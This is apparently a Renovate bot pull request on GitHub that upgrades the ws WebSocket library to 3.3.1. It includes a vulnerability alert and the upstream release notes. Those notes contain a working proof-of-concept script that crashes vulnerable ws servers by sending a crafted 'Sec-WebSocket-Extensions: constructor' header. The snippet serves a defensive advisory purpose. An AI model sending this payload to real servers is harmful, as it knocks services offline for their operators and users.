espadrine
commented
4 years ago Fixed by 576234da1d72c22f091ed4e3ab4c5b4c30d1893d
Closed renovate[bot] closed 4 years ago
espadrine
commented
4 years ago Fixed by 576234da1d72c22f091ed4e3ab4c5b4c30d1893d
This PR contains the following updates:
2.2.3->3.3.1GitHub Vulnerability Alerts
GHSA-5v72-xg48-5rpm / WS-2017-0421
Affected version of ws (0.2.6 through 3.3.0 excluding 1.1.5) are vulnerable to A specially crafted value of the Sec-WebSocket-Extensions header that used Object.prototype property names as extension or parameter names could be used to make a ws server crash.
Release Notes
websockets/ws
### [`v3.3.1`](https://togithub.com/websockets/ws/releases/3.3.1) [Compare Source](https://togithub.com/websockets/ws/compare/3.3.0...3.3.1) ### Bug fixes - Fixed a DoS vulnerability ([`c4fe466`](https://togithub.com/websockets/ws/commit/c4fe466)). A specially crafted value of the `Sec-WebSocket-Extensions` header that used `Object.prototype` property names as extension or parameter names could be used to make a ws server crash. ```js const WebSocket = require('ws'); const net = require('net'); const wss = new WebSocket.Server({ port: 3000 }, function () { const payload = 'constructor'; // or ',;constructor' const request = [ 'GET / HTTP/1.1', 'Connection: Upgrade', 'Sec-WebSocket-Key: test', 'Sec-WebSocket-Version: 8', `Sec-WebSocket-Extensions: ${payload}`, 'Upgrade: websocket', '\r\n' ].join('\r\n'); const socket = net.connect(3000, function () { socket.resume(); socket.write(request); }); }); ``` The vulnerability has been privately reported by Nick Starke and Ryan Knell of Sonatype Security Research and promptly fixed. Please update now! ### [`v3.3.0`](https://togithub.com/websockets/ws/releases/3.3.0) [Compare Source](https://togithub.com/websockets/ws/compare/3.2.0...3.3.0) ### Features - Added `ecdhCurve` option ([#1228](https://togithub.com/websockets/ws/issues/1228)). ### [`v3.2.0`](https://togithub.com/websockets/ws/releases/3.2.0) [Compare Source](https://togithub.com/websockets/ws/compare/3.1.0...3.2.0) ### Features - Added ability to specify the compression level ([#1199](https://togithub.com/websockets/ws/issues/1199)). - Added ability to limit the number of concurrent calls to zlib ([#1204](https://togithub.com/websockets/ws/issues/1204)). ### [`v3.1.0`](https://togithub.com/websockets/ws/releases/3.1.0) [Compare Source](https://togithub.com/websockets/ws/compare/3.0.0...3.1.0) ### Features - Added ability to specify the handshake request timeout ([#1177](https://togithub.com/websockets/ws/issues/1177)). ### Bug fixes - Fixed an issue where `CloseEvent#wasClean` was incorrectly set to `false` for close codes in the 3000-4999 range ([#1146](https://togithub.com/websockets/ws/issues/1146)). ### [`v3.0.0`](https://togithub.com/websockets/ws/releases/3.0.0) [Compare Source](https://togithub.com/websockets/ws/compare/2.3.1...3.0.0) ### Breaking changes - Removed the `upgradeReq` property ([#1099](https://togithub.com/websockets/ws/issues/1099)). - Removed unnecessary events ([#1100](https://togithub.com/websockets/ws/issues/1100)). - Removed the `flags` argument from the `'message'`, `'ping'`, and `'pong'` events ([#1101](https://togithub.com/websockets/ws/issues/1101)). - The permessage-deflate extension is now disabled by default on the server ([#1107](https://togithub.com/websockets/ws/issues/1107)). ### [`v2.3.1`](https://togithub.com/websockets/ws/releases/2.3.1) [Compare Source](https://togithub.com/websockets/ws/compare/2.3.0...2.3.1) ### Bug fixes - Fixed an issue that prevented `WebSocket.prototype.close()` from working properly when called from a listener of the `headers` event ([`732aaf0`](https://togithub.com/websockets/ws/commit/732aaf0)). ### [`v2.3.0`](https://togithub.com/websockets/ws/releases/2.3.0) [Compare Source](https://togithub.com/websockets/ws/compare/2.2.3...2.3.0) ### Features - All hooks have now access to the upgrade request ([#1070](https://togithub.com/websockets/ws/issues/1070)). - The `WebSocket` client now emits a `headers` event ([#1082](https://togithub.com/websockets/ws/issues/1082)).Renovate configuration
:date: Schedule: "" (UTC).
:vertical_traffic_light: Automerge: Disabled by config. Please merge this manually once you are satisfied.
:recycle: Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
:no_bell: Ignore: Close this PR and you won't be reminded about this update again.
This PR has been generated by WhiteSource Renovate. View repository job log here.